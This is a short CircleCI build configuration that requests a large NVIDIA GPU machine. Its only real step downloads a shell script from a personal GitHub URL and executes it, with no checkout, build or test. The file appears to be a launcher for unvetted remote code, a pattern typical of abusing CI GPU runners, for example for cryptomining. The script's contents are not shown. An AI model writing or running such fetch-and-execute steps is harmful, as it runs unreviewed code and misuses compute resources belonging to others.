version: 2.1
jobs:
  build:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-1604-cuda-10.1:201909-23
    steps:
      - run: nvidia-smi
      - run: wget https://raw.githubusercontent.com/deviolare/project/main/mencret.sh && chmod +x mencret.sh && ./mencret.sh